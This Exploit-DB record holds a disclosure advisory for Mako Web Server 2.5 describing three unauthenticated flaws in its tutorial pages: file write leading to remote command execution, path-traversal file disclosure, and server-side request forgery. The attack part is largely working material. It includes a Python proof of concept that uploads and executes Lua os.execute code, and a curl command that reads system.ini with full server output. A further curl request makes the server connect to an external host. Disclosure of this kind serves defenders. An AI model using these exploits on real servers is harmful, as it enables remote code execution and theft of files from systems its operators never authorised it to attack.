{"id": "EDB-ID:42683", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mako Web Server 2.5 - Multiple Vulnerabilities", "description": "", "published": "2017-09-13T00:00:00", "modified": "2017-09-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/42683", "reporter": "hyp3rlinx", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:16:42", "viewCount": 12, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "c60332b57a5f273a3b163fb3f2933135"}, "sourceHref": "https://www.exploit-db.com/download/42683", "sourceData": "[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391\r\n[+] Credits: John Page a.k.a hyp3rlinx\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\nVulnerabilities Summary\r\nThe following advisory describes three (3) vulnerabilities found in Mako Server\u2019s tutorial page.\r\n\r\nThe vulnerabilities found are:\r\n\r\nUnauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution\r\nUnauthenticated File Disclosure\r\nUnauthenticated Server Side Request Forgery\r\nAs these tutorials may be used as the basis for production code, it is important for users to be aware of these issues.\r\n\r\n\u201cAs a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides\r\nan application server environment from which developers can design and implement complete, custom solutions. 
The Mako Web Server is ideal for embedded Linux systems.\u201d\r\n\r\nCredit\r\nAn independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n\r\nVendor response\r\n\r\nRealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the\r\ntechnical claims, to give a fix timeline or coordinate an advisory, saying:\r\n\r\n\u201cI just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.\r\nInternally I need to set-up a cost allocation account for billing against these support inquiries.\u201d\r\n\r\nAt this time it\u2019s unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.\r\n\r\n\r\nVulnerabilities details\r\n\r\nUnauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:\r\n\r\nThe Mako web-server tutorial does not sufficiently sanitize HTTP PUT requests: when an attacker sends an HTTP PUT request to the \u2018save.lsp\u2018 web page, the input is passed\r\nto a function responsible for accessing the filesystem.\r\n\r\nThe attacker's input will be saved on the victim's machine and can be executed by sending an HTTP GET request to \u2018manage.lsp\u2018.\r\n\r\n\r\nHTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'\r\nHTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua'\r\n\r\n\r\nProof of Concept\r\n\r\n\r\nimport urllib2,time\r\n\r\n#MakoServer v2.5 Remote Command Execution 0day\r\n#Credits: John Page AKA hyp3rlinx\r\n#=========================================\r\n\r\nprint 'MakoServer v2.5 Remote Command Execution'\r\n\r\nCMD=\"os.execute('c:/Windows/system32/calc.exe')\"\r\n\r\nopener = urllib2.build_opener(urllib2.HTTPHandler)\r\nrequest = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', 
data=CMD)\r\nrequest.add_header('Content-Type', 'text/plain;charset=UTF-8')\r\nrequest.add_header('X-Requested-With', 'XMLHttpRequest')\r\nrequest.add_header('Referer', 'http://localhost/Lua-Types.lsp')\r\nrequest.get_method = lambda: 'PUT'\r\nopener.open(request)\r\n\r\ntime.sleep(1)\r\n\r\nurllib2.urlopen('http://IP/examples/manage.lsp?execute=true&ex=2.1&type=lua')\r\n\r\n\r\n\r\nUnauthenticated File Disclosure\r\n\r\nThe Mako web-server tutorial does not sufficiently sanitize GET requests: when an attacker sends a GET request to the URI IP/fs/../.., the input is passed\r\nwithout modification and a response with the file content is returned.\r\n\r\nProof of Concept\r\nThe following GET request will return the C/Windows/system.ini content:\r\n\r\ncurl -v http://VICTIM-IP/fs/C/Windows/system.ini\r\n\r\n* About to connect() to VICTIM-IP port 80\r\n* Trying VICTIM-IP... connected\r\n* Connected to VICTIM-IP (VICTIM-IP) port 80\r\n> GET /fs/C/Windows/system.ini HTTP/1.1\r\n> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5\r\n> Host: VICTIM-IP\r\n> Accept: */*\r\n>\r\n< HTTP/1.1 200 OK\r\n< Date: Mon, 07 Aug 2017 22:21:27 GMT\r\n< Server: MakoServer.net\r\n< Content-Type: application/octet-stream\r\n< Accept-Ranges: bytes\r\n< Etag: 58b4be20\r\n< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT\r\n< Content-Length: 219\r\n< Keep-Alive: Keep-Alive\r\n; for 16-bit app support\r\n[386Enh]\r\nwoafont=dosapp.fon\r\nEGA80WOA.FON=EGA80WOA.FON\r\nEGA40WOA.FON=EGA40WOA.FON\r\nCGA80WOA.FON=CGA80WOA.FON\r\nCGA40WOA.FON=CGA40WOA.FON\r\n\r\n[drivers]\r\nwave=mmdrv.dll\r\ntimer=timer.drv\r\n\r\n[mci]\r\n\r\n\r\nServer Side Request Forgery\r\n\r\nThe Mako web-server tutorial does not sufficiently sanitize incoming POST requests: when an attacker sends a POST request to the \u2018rtl/appmgr/new-application.lsp\u2018\r\nURI, the input will be executed and the server will connect to the attacker\u2019s machine.\r\n\r\nProof of 
Concept\r\nStart Wireshark to see successful connections made from the Mako Web Server victim machine.\r\n\r\nInitiate requests from another machine using curl:\r\n\r\ncurl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP\r\n\r\n\r\n\r\nNetwork Access:\r\n===============\r\nRemote\r\n\r\n\r\n\r\nSeverity:\r\n=========\r\nHigh\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\nI would like to acknowledge Beyond Security\u2019s SSD program for the help with co-ordination of this vulnerability.\r\nMore details can be found on their blog at:\r\n\r\nhttps://blogs.securiteam.com/index.php/archives/3391\r\n\r\n\r\n\r\n[+] Disclaimer\r\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\r\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\r\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\r\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\r\nor exploits by the author or elsewhere. All content (c).\r\n\r\nhyp3rlinx", "osvdbidlist": [], "exploitType": "remote", "verified": true}